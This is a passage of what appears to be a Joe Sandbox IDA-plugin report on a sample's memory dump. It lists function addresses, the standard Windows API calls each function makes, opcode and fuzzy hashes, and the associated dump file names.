                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                        • Opcode ID: b368e98a76119e7d5dbbe6c2b69621e7da957737b00ec98fce68f686df387a80
                                                                                                                                                                        • Instruction ID: 06c48b67b5f98638247b1d18f0e8e24b5b88e19adf34016de5e7cd24893280e2
                                                                                                                                                                        • Opcode Fuzzy Hash: b368e98a76119e7d5dbbe6c2b69621e7da957737b00ec98fce68f686df387a80
                                                                                                                                                                        • Instruction Fuzzy Hash: 63E04CB5F003059BDF20DB759D49B6F76FCEB44746F440464F955F2291D668D800C621
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC29EC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BB4266,?,?,?,00000001), ref: 00BC29F1
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BC29FA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: a5723ca6b613086adbfe90fbc2cb9f800ac9e50535f05c4db56c9c09097b9f3d
                                                                                                                                                                        • Instruction ID: 0ac8e1211df5444a95d4f282901caf3950a9d96f49da5a93852b831b6381f4b8
                                                                                                                                                                        • Opcode Fuzzy Hash: a5723ca6b613086adbfe90fbc2cb9f800ac9e50535f05c4db56c9c09097b9f3d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB09235044708AFDA402B91EC49B8E3F28EB14A6BF004012F60D540728B6254908E91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC87C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00BC87B4,00000001,?,00BC76BC,00BC775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00BC87F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                        • Opcode ID: 30bea6ef89167fa184e15517f6f96b2dff6abbc9a61ff76241ec615ca5c0d50c
                                                                                                                                                                        • Instruction ID: 5e28037f283bc11b718d49eb9e9b9455a391573a23765543cb13a8ea7e886fc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 30bea6ef89167fa184e15517f6f96b2dff6abbc9a61ff76241ec615ca5c0d50c
                                                                                                                                                                        • Instruction Fuzzy Hash: F5E0B636151308BFDF11CFA4EC85FAD3BA5EB08716F144059BA0C5A570DA71A9609B85
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC884E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,?,00BB580F,?,00BB580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00BC8875
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        • Opcode ID: cd1e8f40df1259310933bd6b1300cc62a4ce3902b2efdf6a70b7253c8c376e99
                                                                                                                                                                        • Instruction ID: 5a0d2858a619ba07cdbb7ae07d91c4edc04369dd95c43c7a76734adccab4edf7
                                                                                                                                                                        • Opcode Fuzzy Hash: cd1e8f40df1259310933bd6b1300cc62a4ce3902b2efdf6a70b7253c8c376e99
                                                                                                                                                                        • Instruction Fuzzy Hash: DED01732000208FF8F019FE0FC49E6E3BA9FB08311B040445FA1C45420DA32A820DB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC29BB Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,00BC1DA6,00BC1D5B), ref: 00BC29C1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: 76604328631378ad304327e07f972471bf97d1f93027cd320a3d095b5826fa90
                                                                                                                                                                        • Instruction ID: 8b546b436f791cc75571dc9bb7263ee30ed76e7d88c1dcaef819d575ad68f08e
                                                                                                                                                                        • Opcode Fuzzy Hash: 76604328631378ad304327e07f972471bf97d1f93027cd320a3d095b5826fa90
                                                                                                                                                                        • Instruction Fuzzy Hash: 9CA0113000030CAB8A002B82EC08A8E3F2CEA002AAB008022F80C000328B22A8A08A80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB78D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00BB3FED,00C97990,00000014), ref: 00BB78D5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                        • Opcode ID: e28a7c57307cf86376ee5cb75722bbeb6488b4c91059634aaf59600f62aa5437
                                                                                                                                                                        • Instruction ID: f076c6c2d962e8fdccc2d94aad68a8293a1bb0c9b8bdabb30732c3f32f156b94
                                                                                                                                                                        • Opcode Fuzzy Hash: e28a7c57307cf86376ee5cb75722bbeb6488b4c91059634aaf59600f62aa5437
                                                                                                                                                                        • Instruction Fuzzy Hash: FFB012B03053024B47080B387C5830D39D4770C30A710003DB007C2160DF30C4A0EA05
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B95457 Relevance: .7, Instructions: 723COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 17def4e7df9b2a73f228d5b091a09e12efb4ad278694c998ed9066b5e0f4eb42
                                                                                                                                                                        • Instruction ID: 0a735d7806c8367d0798eff1be37aa3e7d21934094e10ccf66c84ca3664e86db
                                                                                                                                                                        • Opcode Fuzzy Hash: 17def4e7df9b2a73f228d5b091a09e12efb4ad278694c998ed9066b5e0f4eb42
                                                                                                                                                                        • Instruction Fuzzy Hash: BD42BF71629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B99686 Relevance: .5, Instructions: 478COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 19ae2f6dee06fab90006700bd95d5443f4e147a96ae4af3030847a4bb4970d03
                                                                                                                                                                        • Instruction ID: 94cf9c167e40aed44aac6a4fdb2665482426c474cb89261e34d475efebd82769
                                                                                                                                                                        • Opcode Fuzzy Hash: 19ae2f6dee06fab90006700bd95d5443f4e147a96ae4af3030847a4bb4970d03
                                                                                                                                                                        • Instruction Fuzzy Hash: 4622D0B6904B168FCB54CF19D08055AF7E1FF88324F158A6EE9A9A7B10C730BA55CF81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B921C0 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                                                        • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                                                                                        • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                                                        • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B92B80 Relevance: .4, Instructions: 427COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f83aaea82f1645fa3b72d98d0bdf7749d196ebb5b9999c76c31ad62c628b3ecd
                                                                                                                                                                        • Instruction ID: 9d5a6202483375ab126ed515ca183da6c659d27c5f8bb7293ae3cadd98d7a737
                                                                                                                                                                        • Opcode Fuzzy Hash: f83aaea82f1645fa3b72d98d0bdf7749d196ebb5b9999c76c31ad62c628b3ecd
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F025A715187058FC756EE08D49035AF3E1FFC8305F19892DD68987A64E73AAA198F82
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B98030 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                                                                                        • Instruction ID: 51c4355af876fd206a335ec6ff8e121a1b9cfd477648e9c2b4ec81eed2b50cbe
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                                                                                        • Instruction Fuzzy Hash: 39C12833E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9A710 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                                                        • Instruction ID: 95f15fa54facc3e656e53e49e2c9605c65aa1d5a7aa4a5a59e6728a10a90eac0
                                                                                                                                                                        • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                                                        • Instruction Fuzzy Hash: 54A1DA0A8090E4ABEF455A7E80B63EBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B92750 Relevance: .3, Instructions: 336COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                                                                                        • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                                                                                                                                        • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B95447 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
